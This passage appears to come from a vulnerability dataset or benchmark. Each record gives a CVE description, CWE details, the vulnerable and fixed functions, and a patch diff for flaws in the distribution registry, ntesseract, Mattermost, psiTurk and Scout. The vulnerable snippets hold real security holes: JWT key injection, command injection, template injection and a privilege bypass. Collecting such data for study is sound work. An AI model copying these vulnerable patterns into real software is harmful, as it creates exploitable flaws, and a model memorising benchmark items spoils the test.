"end_line": 322, "snippet": "def downloaded_panel_name(panel_obj, format) -> str:\n \"\"\"Return a string with the file name to be downloaded\n\n Args:\n panel_obj(dict): scout.models.panel.gene_panel\n format(str): \"pdf\" or \"txt\"\n Returns:\n a string describing the panel\n \"\"\"\n sanitized_panel_id = re.sub(r\"[^a-zA-Z_\\-]+\", \"\", panel_obj[\"panel_name\"])\n\n return \"_\".join(\n [\n sanitized_panel_id,\n str(panel_obj[\"version\"]),\n dt.datetime.now().strftime(DATE_DAY_FORMATTER),\n f\"scout.{format}\",\n ]\n )"}], "vul_patch": "--- a/scout/server/blueprints/panels/controllers.py\n+++ b/scout/server/blueprints/panels/controllers.py\n@@ -7,9 +7,11 @@\n Returns:\n a string describing the panel\n \"\"\"\n+ sanitized_panel_id = re.sub(r\"[^a-zA-Z_\\-]+\", \"\", panel_obj[\"panel_name\"])\n+\n return \"_\".join(\n [\n- panel_obj[\"panel_name\"],\n+ sanitized_panel_id,\n str(panel_obj[\"version\"]),\n dt.datetime.now().strftime(DATE_DAY_FORMATTER),\n f\"scout.{format}\",\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-24976", "cve_description": "Distribution is a toolkit to pack, ship, store, and deliver container content. Systems running registry versions 3.0.0-beta.1 through 3.0.0-rc.2 with token authentication enabled may be vulnerable to an issue in which token authentication allows an attacker to inject an untrusted signing key in a JSON web token (JWT). The issue lies in how the JSON web key (JWK) verification is performed. When a JWT contains a JWK header without a certificate chain, the code only checks if the KeyID (`kid`) matches one of the trusted keys, but doesn't verify that the actual key material matches. A fix for the issue is available at commit 5ea9aa028db65ca5665f6af2c20ecf9dc34e5fcd and expected to be a part of version 3.0.0-rc.3. 
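The Scout fix (CVE-2024-47531) above is small enough to lift out whole: a character whitelist over the user-controlled part of the download filename. Reduced to a standalone function (the sample inputs are made up):

import re

def sanitize_panel_id(panel_name):
    # Drop everything except letters, underscore and hyphen, so a crafted
    # name cannot smuggle dots, slashes or a fake extension into the filename.
    return re.sub(r"[^a-zA-Z_\-]+", "", panel_name)

assert sanitize_panel_id("cardio-panel") == "cardio-panel"
assert sanitize_panel_id("evil.exe\r\n") == "evilexe"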
There is no way to work around this issue without patching if the system requires token authentication.", "cwe_info": {"CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/distribution/distribution", "patch_url": ["https://github.com/distribution/distribution/commit/5ea9aa028db65ca5665f6af2c20ecf9dc34e5fcd"], "programing_language": "Go", "vul_func": [{"id": "vul_go_68_1", "commit": "939a525", "file_path": "registry/auth/token/token.go", "start_line": 215, "end_line": 251, "snippet": "func verifyJWK(header jose.Header, verifyOpts VerifyOptions) (signingKey crypto.PublicKey, err error) {\n\tjwk := header.JSONWebKey\n\tsigningKey = jwk.Key\n\n\t// Check to see if the key includes a certificate chain.\n\tif len(jwk.Certificates) == 0 {\n\t\t// The JWK should be one of the trusted root keys.\n\t\tif _, trusted := verifyOpts.TrustedKeys[jwk.KeyID]; !trusted {\n\t\t\treturn nil, errors.New(\"untrusted JWK with no certificate chain\")\n\t\t}\n\t\t// The JWK is one of the trusted keys.\n\t\treturn\n\t}\n\n\topts := x509.VerifyOptions{\n\t\tRoots: verifyOpts.Roots,\n\t\tKeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageAny},\n\t}\n\n\tleaf := jwk.Certificates[0]\n\tif opts.Intermediates == nil {\n\t\topts.Intermediates = x509.NewCertPool()\n\t\tfor _, intermediate := range jwk.Certificates[1:] {\n\t\t\topts.Intermediates.AddCert(intermediate)\n\t\t}\n\t}\n\n\t// TODO: this call returns certificate chains which we ignore for now, but\n\t// we should check them for revocations if we have the ability later.\n\tchains, err := leaf.Verify(opts)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tsigningKey = getCertPubKey(chains)\n\n\treturn\n}"}], "fix_func": [{"id": "fix_go_68_1", "commit": "5ea9aa0", "file_path": "registry/auth/token/token.go", "start_line": 215, "end_line": 250, "snippet": "func verifyJWK(header jose.Header, verifyOpts VerifyOptions) (crypto.PublicKey, error) {\n\tjwk := header.JSONWebKey\n\n\t// Check to see if the key includes a certificate chain.\n\tif len(jwk.Certificates) == 0 {\n\t\t// The JWK should be one of the trusted root keys.\n\t\tkey, trusted := verifyOpts.TrustedKeys[jwk.KeyID]\n\t\tif !trusted {\n\t\t\treturn nil, errors.New(\"untrusted JWK with no certificate chain\")\n\t\t}\n\t\t// The JWK is one of the trusted keys.\n\t\treturn key, nil\n\t}\n\n\topts := x509.VerifyOptions{\n\t\tRoots: verifyOpts.Roots,\n\t\tKeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageAny},\n\t}\n\n\tleaf := jwk.Certificates[0]\n\tif opts.Intermediates == nil {\n\t\topts.Intermediates = x509.NewCertPool()\n\t\tfor _, intermediate := range jwk.Certificates[1:] {\n\t\t\topts.Intermediates.AddCert(intermediate)\n\t\t}\n\t}\n\n\t// TODO: this call returns certificate chains which we ignore for now, but\n\t// we should check them for revocations if we have the ability later.\n\tchains, err := leaf.Verify(opts)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn getCertPubKey(chains), nil\n}"}], "vul_patch": "--- a/registry/auth/token/token.go\n+++ b/registry/auth/token/token.go\n@@ -1,15 +1,15 @@\n-func verifyJWK(header jose.Header, verifyOpts VerifyOptions) (signingKey crypto.PublicKey, err error) {\n+func verifyJWK(header jose.Header, verifyOpts VerifyOptions) (crypto.PublicKey, error) {\n \tjwk := header.JSONWebKey\n-\tsigningKey = jwk.Key\n \n \t// Check to see if the 
key includes a certificate chain.\n \tif len(jwk.Certificates) == 0 {\n \t\t// The JWK should be one of the trusted root keys.\n-\t\tif _, trusted := verifyOpts.TrustedKeys[jwk.KeyID]; !trusted {\n+\t\tkey, trusted := verifyOpts.TrustedKeys[jwk.KeyID]\n+\t\tif !trusted {\n \t\t\treturn nil, errors.New(\"untrusted JWK with no certificate chain\")\n \t\t}\n \t\t// The JWK is one of the trusted keys.\n-\t\treturn\n+\t\treturn key, nil\n \t}\n \n \topts := x509.VerifyOptions{\n@@ -31,7 +31,6 @@\n \tif err != nil {\n \t\treturn nil, err\n \t}\n-\tsigningKey = getCertPubKey(chains)\n \n-\treturn\n+\treturn getCertPubKey(chains), nil\n }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-24976:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/distribution\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestVerifyJWKWithTrustedKey$ github.com/distribution/distribution/v3/registry/auth/token\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2025-24976:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/distribution\ngit apply --whitespace=nowarn /workspace/fix.patch\ngo test -timeout 30s -run '^(TestTokenVerify|TestAccessController|TestLeeway|TestNewAccessControllerPemBlock)$' github.com/distribution/distribution/v3/registry/auth/token"} {"cve_id": "CVE-2020-28446", "cve_description": "The package ntesseract before 0.2.9 are vulnerable to Command Injection via lib/tesseract.js.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/taoyuan/ntesseract", "patch_url": ["https://github.com/taoyuan/ntesseract/commit/fcbc36f381798b4362179c0cdf9961b437c7b619"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_221_1", "commit": "a3ffac9", "file_path": "lib/tesseract.js", "start_line": 38, "end_line": 62, "snippet": " command: function (image, options) {\n // assemble tesseract command\n const command = [options.binary, image, options.output];\n\n if (options.l !== null) {\n command.push('-l ' + options.l);\n }\n\n if (options.psm !== null) {\n command.push('--psm ' + options.psm);\n }\n\n if (options.config !== null) {\n command.push(options.config);\n }\n\n const names = Object.keys(options);\n names.forEach(function (name) {\n if (name.indexOf('-') === 0) {\n command.push(name + ' ' + options[name]);\n }\n });\n\n return command.join(' ');\n },"}], 
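The distribution patch above changes which key is returned for a chainless JWK: the vulnerable code trusted the key material carried inside the token once the kid matched, while the fix returns the stored trusted key. A hedged Python paraphrase of that control flow (dict-based JWK shape assumed):

    def verify_jwk(jwk, trusted_keys):
        if not jwk.get("certificates"):
            key = trusted_keys.get(jwk["kid"])
            if key is None:
                raise ValueError("untrusted JWK with no certificate chain")
            # Return the *stored* key; the vulnerable version effectively
            # returned jwk["key"], i.e. attacker-supplied material.
            return key
        raise NotImplementedError("certificate-chain verification elided")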
"fix_func": [{"id": "fix_js_221_1", "commit": "fcbc36f381798b4362179c0cdf9961b437c7b619", "file_path": "lib/tesseract.js", "start_line": 38, "end_line": 66, "snippet": " command: function (image, options) {\n if (image.startsWith('\"')) {\n image = '\"' + image + '\"';\n }\n\n // assemble tesseract command\n const command = [options.binary, image, options.output];\n\n if (options.l !== null) {\n command.push('-l ' + options.l);\n }\n\n if (options.psm !== null) {\n command.push('--psm ' + options.psm);\n }\n\n if (options.config !== null) {\n command.push(options.config);\n }\n\n const names = Object.keys(options);\n names.forEach(function (name) {\n if (name.indexOf('-') === 0) {\n command.push(name + ' ' + options[name]);\n }\n });\n\n return command.join(' ');\n },"}], "vul_patch": "--- a/lib/tesseract.js\n+++ b/lib/tesseract.js\n@@ -1,4 +1,8 @@\n command: function (image, options) {\n+ if (image.startsWith('\"')) {\n+ image = '\"' + image + '\"';\n+ }\n+\n // assemble tesseract command\n const command = [options.binary, image, options.output];\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1332", "cve_description": "One of the API in Mattermost version 6.4.1 and earlier fails to properly protect the permissions, which allows the authenticated members with restricted custom admin role to bypass the restrictions and view the server logs and server config.json file contents.", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/mattermost/mattermost", "patch_url": ["https://github.com/mattermost/mattermost/commit/20c73013176ae9cce4c1f91cbfb7d3a43858056e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_100_1", "commit": "f6fef93", "file_path": "api4/system.go", "start_line": 75, "end_line": 126, "snippet": "func generateSupportPacket(c *Context, w http.ResponseWriter, r *http.Request) {\n\tconst FileMime = \"application/zip\"\n\tconst OutputDirectory = \"support_packet\"\n\n\tif *c.App.Config().ExperimentalSettings.RestrictSystemAdmin {\n\t\tc.Err = model.NewAppError(\"generateSupportPacket\", \"api.restricted_system_admin\", nil, \"\", http.StatusForbidden)\n\t\treturn\n\t}\n\n\t// Checking to see if the user is a admin of any sort or not\n\t// If they are a admin, they should theoretically have access to one or more of the system console read permissions\n\tif !c.App.SessionHasPermissionToAny(*c.AppContext.Session(), model.SysconsoleReadPermissions) {\n\t\tc.SetPermissionError(model.SysconsoleReadPermissions...)\n\t\treturn\n\t}\n\n\t// Checking to see if the server has a e10 or e20 license (this feature is only permitted for servers with licenses)\n\tif c.App.Srv().License() == nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.no_license\", nil, \"\", http.StatusForbidden)\n\t\treturn\n\t}\n\n\tfileDatas := c.App.GenerateSupportPacket()\n\n\t// Constructing the ZIP file name as per spec (mattermost_support_packet_YYYY-MM-DD-HH-MM.zip)\n\tnow := time.Now()\n\toutputZipFilename := fmt.Sprintf(\"mattermost_support_packet_%s.zip\", now.Format(\"2006-01-02-03-04\"))\n\n\tfileStorageBackend := c.App.FileBackend()\n\n\t// We do this incase we get concurrent requests, we will always have a unique directory.\n\t// This is to avoid the situation where we try to write to the same directory while we are trying to delete it (further 
down)\n\toutputDirectoryToUse := OutputDirectory + \"_\" + model.NewId()\n\terr := c.App.CreateZipFileAndAddFiles(fileStorageBackend, fileDatas, outputZipFilename, outputDirectoryToUse)\n\tif err != nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.unable_to_create_zip_file\", nil, err.Error(), http.StatusForbidden)\n\t\treturn\n\t}\n\n\tfileBytes, err := fileStorageBackend.ReadFile(path.Join(outputDirectoryToUse, outputZipFilename))\n\tdefer fileStorageBackend.RemoveDirectory(outputDirectoryToUse)\n\tif err != nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.unable_to_read_file_from_backend\", nil, err.Error(), http.StatusForbidden)\n\t\treturn\n\t}\n\tfileBytesReader := bytes.NewReader(fileBytes)\n\n\t// Send the zip file back to client\n\t// We are able to pass 0 for content size due to the fact that Golang's serveContent (https://golang.org/src/net/http/fs.go)\n\t// already sets that for us\n\twriteFileResponse(outputZipFilename, FileMime, 0, now, *c.App.Config().ServiceSettings.WebserverMode, fileBytesReader, true, w, r)\n}"}], "fix_func": [{"id": "fix_go_100_1", "commit": "20c73013176ae9cce4c1f91cbfb7d3a43858056e", "file_path": "api4/system.go", "start_line": 75, "end_line": 125, "snippet": "func generateSupportPacket(c *Context, w http.ResponseWriter, r *http.Request) {\n\tconst FileMime = \"application/zip\"\n\tconst OutputDirectory = \"support_packet\"\n\n\tif *c.App.Config().ExperimentalSettings.RestrictSystemAdmin {\n\t\tc.Err = model.NewAppError(\"generateSupportPacket\", \"api.restricted_system_admin\", nil, \"\", http.StatusForbidden)\n\t\treturn\n\t}\n\n\t// Support packet generation is limited to system admins (MM-42271).\n\tif !c.App.SessionHasPermissionTo(*c.AppContext.Session(), model.PermissionManageSystem) {\n\t\tc.SetPermissionError(model.PermissionManageSystem)\n\t\treturn\n\t}\n\n\t// Checking to see if the server has a e10 or e20 license (this feature is only permitted for servers with licenses)\n\tif c.App.Srv().License() == nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.no_license\", nil, \"\", http.StatusForbidden)\n\t\treturn\n\t}\n\n\tfileDatas := c.App.GenerateSupportPacket()\n\n\t// Constructing the ZIP file name as per spec (mattermost_support_packet_YYYY-MM-DD-HH-MM.zip)\n\tnow := time.Now()\n\toutputZipFilename := fmt.Sprintf(\"mattermost_support_packet_%s.zip\", now.Format(\"2006-01-02-03-04\"))\n\n\tfileStorageBackend := c.App.FileBackend()\n\n\t// We do this incase we get concurrent requests, we will always have a unique directory.\n\t// This is to avoid the situation where we try to write to the same directory while we are trying to delete it (further down)\n\toutputDirectoryToUse := OutputDirectory + \"_\" + model.NewId()\n\terr := c.App.CreateZipFileAndAddFiles(fileStorageBackend, fileDatas, outputZipFilename, outputDirectoryToUse)\n\tif err != nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.unable_to_create_zip_file\", nil, err.Error(), http.StatusForbidden)\n\t\treturn\n\t}\n\n\tfileBytes, err := fileStorageBackend.ReadFile(path.Join(outputDirectoryToUse, outputZipFilename))\n\tdefer fileStorageBackend.RemoveDirectory(outputDirectoryToUse)\n\tif err != nil {\n\t\tc.Err = model.NewAppError(\"Api4.generateSupportPacket\", \"api.unable_to_read_file_from_backend\", nil, err.Error(), http.StatusForbidden)\n\t\treturn\n\t}\n\tfileBytesReader := bytes.NewReader(fileBytes)\n\n\t// Send the zip file back to client\n\t// We are able to pass 0 for 
content size due to the fact that Golang's serveContent (https://golang.org/src/net/http/fs.go)\n\t// already sets that for us\n\twriteFileResponse(outputZipFilename, FileMime, 0, now, *c.App.Config().ServiceSettings.WebserverMode, fileBytesReader, true, w, r)\n}"}], "vul_patch": "--- a/api4/system.go\n+++ b/api4/system.go\n@@ -7,10 +7,9 @@\n \t\treturn\n \t}\n \n-\t// Checking to see if the user is a admin of any sort or not\n-\t// If they are a admin, they should theoretically have access to one or more of the system console read permissions\n-\tif !c.App.SessionHasPermissionToAny(*c.AppContext.Session(), model.SysconsoleReadPermissions) {\n-\t\tc.SetPermissionError(model.SysconsoleReadPermissions...)\n+\t// Support packet generation is limited to system admins (MM-42271).\n+\tif !c.App.SessionHasPermissionTo(*c.AppContext.Session(), model.PermissionManageSystem) {\n+\t\tc.SetPermissionError(model.PermissionManageSystem)\n \t\treturn\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-4315", "cve_description": "A vulnerability has been found in NYUCCL psiTurk up to 3.2.0 and classified as critical. This vulnerability affects unknown code of the file psiturk/experiment.py. The manipulation of the argument mode leads to improper neutralization of special elements used in a template engine. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2.1 is able to address this issue. The name of the patch is 47787e15cecd66f2aa87687bf852ae0194a4335f. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-219676.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/NYUCCL/psiTurk", "patch_url": ["https://github.com/NYUCCL/psiTurk/commit/47787e15cecd66f2aa87687bf852ae0194a4335f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_34_1", "commit": "231d566", "file_path": "psiturk/experiment.py", "start_line": 287, "end_line": 391, "snippet": "def advertisement():\n \"\"\"\n This is the url we give for the ad for our 'external question'. 
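The Mattermost change above is a classic privilege-check tightening: replace "any console read permission" with the single manage-system permission. Schematically, in Python (permission names assumed):

    def can_generate_support_packet(session_permissions):
        # Vulnerable check: any(p in session_permissions for p in SYSCONSOLE_READ)
        return "manage_system" in session_permissions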
The ad has\n to display two different things: This page will be called from within\n mechanical turk, with url arguments hitId, assignmentId, and workerId.\n If the worker has not yet accepted the hit:\n These arguments will have null values, we should just show an ad for\n the experiment.\n If the worker has accepted the hit:\n These arguments will have appropriate values and we should enter the\n person in the database and provide a link to the experiment popup.\n \"\"\"\n user_agent_string = request.user_agent.string\n user_agent_obj = user_agents.parse(user_agent_string)\n browser_ok = True\n browser_exclude_rule = CONFIG.get('Task Parameters', 'browser_exclude_rule')\n for rule in browser_exclude_rule.split(','):\n myrule = rule.strip()\n if myrule in [\"mobile\", \"tablet\", \"touchcapable\", \"pc\", \"bot\"]:\n if (myrule == \"mobile\" and user_agent_obj.is_mobile) or\\\n (myrule == \"tablet\" and user_agent_obj.is_tablet) or\\\n (myrule == \"touchcapable\" and user_agent_obj.is_touch_capable) or\\\n (myrule == \"pc\" and user_agent_obj.is_pc) or\\\n (myrule == \"bot\" and user_agent_obj.is_bot):\n browser_ok = False\n elif myrule == \"Safari\" or myrule == \"safari\":\n if \"Chrome\" in user_agent_string and \"Safari\" in user_agent_string:\n pass\n elif \"Safari\" in user_agent_string:\n browser_ok = False\n elif myrule in user_agent_string:\n browser_ok = False\n\n if not browser_ok:\n # Handler for IE users if IE is not supported.\n raise ExperimentError('browser_type_not_allowed')\n\n if not ('hitId' in request.args and 'assignmentId' in request.args):\n raise ExperimentError('hit_assign_worker_id_not_set_in_mturk')\n hit_id = request.args['hitId']\n assignment_id = request.args['assignmentId']\n mode = request.args['mode']\n if hit_id[:5] == \"debug\":\n debug_mode = True\n else:\n debug_mode = False\n already_in_db = False\n if 'workerId' in request.args:\n worker_id = request.args['workerId']\n # First check if this workerId has completed the task before (v1).\n nrecords = Participant.query.\\\n filter(Participant.assignmentid != assignment_id).\\\n filter(Participant.workerid == worker_id).\\\n count()\n\n if nrecords > 0: # Already completed task\n already_in_db = True\n else: # If worker has not accepted the hit\n worker_id = None\n try:\n part = Participant.query.\\\n filter(Participant.hitid == hit_id).\\\n filter(Participant.assignmentid == assignment_id).\\\n filter(Participant.workerid == worker_id).\\\n one()\n status = part.status\n except exc.SQLAlchemyError:\n status = None\n\n allow_repeats = CONFIG.getboolean('Task Parameters', 'allow_repeats')\n if (status == STARTED or status == QUITEARLY) and not debug_mode:\n # Once participants have finished the instructions, we do not allow\n # them to start the task again.\n raise ExperimentError('already_started_exp_mturk')\n elif status == COMPLETED or (status == SUBMITTED and not already_in_db):\n # 'or status == SUBMITTED' because we suspect that sometimes the post\n # to mturk fails after we've set status to SUBMITTED, so really they\n # have not successfully submitted. 
This gives another chance for the\n # submit to work.\n\n # They've finished the experiment but haven't successfully submitted the HIT\n # yet.\n return render_template(\n 'thanks-mturksubmit.html',\n using_sandbox=(mode == \"sandbox\"),\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )\n elif already_in_db and not (debug_mode or allow_repeats):\n raise ExperimentError('already_did_exp_hit')\n elif status == ALLOCATED or not status or debug_mode:\n # Participant has not yet agreed to the consent. They might not\n # even have accepted the HIT.\n with open('templates/ad.html', 'r') as temp_file:\n ad_string = temp_file.read()\n ad_string = insert_mode(ad_string, mode)\n return render_template_string(\n ad_string,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )\n else:\n raise ExperimentError('status_incorrectly_set')"}, {"id": "vul_py_34_2", "commit": "231d566", "file_path": "psiturk/experiment.py", "start_line": 396, "end_line": 415, "snippet": "def give_consent():\n \"\"\"\n Serves up the consent in the popup window.\n \"\"\"\n if not ('hitId' in request.args and 'assignmentId' in request.args and\n 'workerId' in request.args):\n raise ExperimentError('hit_assign_worker_id_not_set_in_consent')\n hit_id = request.args['hitId']\n assignment_id = request.args['assignmentId']\n worker_id = request.args['workerId']\n mode = request.args['mode']\n with open('templates/consent.html', 'r') as temp_file:\n consent_string = temp_file.read()\n consent_string = insert_mode(consent_string, mode)\n return render_template_string(\n consent_string,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )"}, {"id": "vul_py_34_3", "commit": "231d566", "file_path": "psiturk/experiment.py", "start_line": 734, "end_line": 747, "snippet": "def insert_mode(page_html, mode):\n \"\"\" Insert mode \"\"\"\n page_html = page_html\n match_found = False\n matches = re.finditer('workerId={{ workerid }}', page_html)\n match = None\n for match in matches:\n match_found = True\n if match_found:\n new_html = page_html[:match.end()] + \"&mode=\" + mode +\\\n page_html[match.end():]\n return new_html\n else:\n raise ExperimentError(\"insert_mode_failed\")"}], "fix_func": [{"id": "fix_py_34_1", "commit": "47787e15cecd66f2aa87687bf852ae0194a4335f", "file_path": "psiturk/experiment.py", "start_line": 287, "end_line": 392, "snippet": "def advertisement():\n \"\"\"\n This is the url we give for the ad for our 'external question'. 
The ad has\n to display two different things: This page will be called from within\n mechanical turk, with url arguments hitId, assignmentId, and workerId.\n If the worker has not yet accepted the hit:\n These arguments will have null values, we should just show an ad for\n the experiment.\n If the worker has accepted the hit:\n These arguments will have appropriate values and we should enter the\n person in the database and provide a link to the experiment popup.\n \"\"\"\n user_agent_string = request.user_agent.string\n user_agent_obj = user_agents.parse(user_agent_string)\n browser_ok = True\n browser_exclude_rule = CONFIG.get('Task Parameters', 'browser_exclude_rule')\n for rule in browser_exclude_rule.split(','):\n myrule = rule.strip()\n if myrule in [\"mobile\", \"tablet\", \"touchcapable\", \"pc\", \"bot\"]:\n if (myrule == \"mobile\" and user_agent_obj.is_mobile) or\\\n (myrule == \"tablet\" and user_agent_obj.is_tablet) or\\\n (myrule == \"touchcapable\" and user_agent_obj.is_touch_capable) or\\\n (myrule == \"pc\" and user_agent_obj.is_pc) or\\\n (myrule == \"bot\" and user_agent_obj.is_bot):\n browser_ok = False\n elif myrule == \"Safari\" or myrule == \"safari\":\n if \"Chrome\" in user_agent_string and \"Safari\" in user_agent_string:\n pass\n elif \"Safari\" in user_agent_string:\n browser_ok = False\n elif myrule in user_agent_string:\n browser_ok = False\n\n if not browser_ok:\n # Handler for IE users if IE is not supported.\n raise ExperimentError('browser_type_not_allowed')\n\n if not ('hitId' in request.args and 'assignmentId' in request.args):\n raise ExperimentError('hit_assign_worker_id_not_set_in_mturk')\n hit_id = request.args['hitId']\n assignment_id = request.args['assignmentId']\n mode = request.args['mode']\n if hit_id[:5] == \"debug\":\n debug_mode = True\n else:\n debug_mode = False\n already_in_db = False\n if 'workerId' in request.args:\n worker_id = request.args['workerId']\n # First check if this workerId has completed the task before (v1).\n nrecords = Participant.query.\\\n filter(Participant.assignmentid != assignment_id).\\\n filter(Participant.workerid == worker_id).\\\n count()\n\n if nrecords > 0: # Already completed task\n already_in_db = True\n else: # If worker has not accepted the hit\n worker_id = None\n try:\n part = Participant.query.\\\n filter(Participant.hitid == hit_id).\\\n filter(Participant.assignmentid == assignment_id).\\\n filter(Participant.workerid == worker_id).\\\n one()\n status = part.status\n except exc.SQLAlchemyError:\n status = None\n\n allow_repeats = CONFIG.getboolean('Task Parameters', 'allow_repeats')\n if (status == STARTED or status == QUITEARLY) and not debug_mode:\n # Once participants have finished the instructions, we do not allow\n # them to start the task again.\n raise ExperimentError('already_started_exp_mturk')\n elif status == COMPLETED or (status == SUBMITTED and not already_in_db):\n # 'or status == SUBMITTED' because we suspect that sometimes the post\n # to mturk fails after we've set status to SUBMITTED, so really they\n # have not successfully submitted. 
This gives another chance for the\n # submit to work.\n\n # They've finished the experiment but haven't successfully submitted the HIT\n # yet.\n return render_template(\n 'thanks-mturksubmit.html',\n using_sandbox=(mode == \"sandbox\"),\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )\n elif already_in_db and not (debug_mode or allow_repeats):\n raise ExperimentError('already_did_exp_hit')\n elif status == ALLOCATED or not status or debug_mode:\n # Participant has not yet agreed to the consent. They might not\n # even have accepted the HIT.\n with open('templates/ad.html', 'r') as temp_file:\n ad_string = temp_file.read()\n ad_string = insert_mode(ad_string)\n return render_template_string(\n ad_string,\n mode=mode,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )\n else:\n raise ExperimentError('status_incorrectly_set')"}, {"id": "fix_py_34_2", "commit": "47787e15cecd66f2aa87687bf852ae0194a4335f", "file_path": "psiturk/experiment.py", "start_line": 397, "end_line": 417, "snippet": "def give_consent():\n \"\"\"\n Serves up the consent in the popup window.\n \"\"\"\n if not ('hitId' in request.args and 'assignmentId' in request.args and\n 'workerId' in request.args):\n raise ExperimentError('hit_assign_worker_id_not_set_in_consent')\n hit_id = request.args['hitId']\n assignment_id = request.args['assignmentId']\n worker_id = request.args['workerId']\n mode = request.args['mode']\n with open('templates/consent.html', 'r') as temp_file:\n consent_string = temp_file.read()\n consent_string = insert_mode(consent_string)\n return render_template_string(\n consent_string,\n mode=mode,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n )"}, {"id": "fix_py_34_3", "commit": "47787e15cecd66f2aa87687bf852ae0194a4335f", "file_path": "psiturk/experiment.py", "start_line": 736, "end_line": 749, "snippet": "def insert_mode(page_html):\n \"\"\" Insert mode \"\"\"\n page_html = page_html\n match_found = False\n matches = re.finditer('workerId={{ workerid }}', page_html)\n match = None\n for match in matches:\n match_found = True\n if match_found:\n new_html = page_html[:match.end()] + '&mode={{ mode }}' +\\\n page_html[match.end():]\n return new_html\n else:\n raise ExperimentError(\"insert_mode_failed\")"}], "vul_patch": "--- a/psiturk/experiment.py\n+++ b/psiturk/experiment.py\n@@ -94,9 +94,10 @@\n # even have accepted the HIT.\n with open('templates/ad.html', 'r') as temp_file:\n ad_string = temp_file.read()\n- ad_string = insert_mode(ad_string, mode)\n+ ad_string = insert_mode(ad_string)\n return render_template_string(\n ad_string,\n+ mode=mode,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n\n--- a/psiturk/experiment.py\n+++ b/psiturk/experiment.py\n@@ -1,3 +1,4 @@\n+def give_consent():\n \"\"\"\n Serves up the consent in the popup window.\n \"\"\"\n@@ -10,9 +11,10 @@\n mode = request.args['mode']\n with open('templates/consent.html', 'r') as temp_file:\n consent_string = temp_file.read()\n- consent_string = insert_mode(consent_string, mode)\n+ consent_string = insert_mode(consent_string)\n return render_template_string(\n consent_string,\n+ mode=mode,\n hitid=hit_id,\n assignmentid=assignment_id,\n workerid=worker_id\n\n--- a/psiturk/experiment.py\n+++ b/psiturk/experiment.py\n@@ -1,4 +1,4 @@\n-def insert_mode(page_html, mode):\n+def insert_mode(page_html):\n \"\"\" Insert mode \"\"\"\n page_html = page_html\n match_found = False\n@@ -7,7 +7,7 @@\n for match in matches:\n match_found = True\n if match_found:\n- 
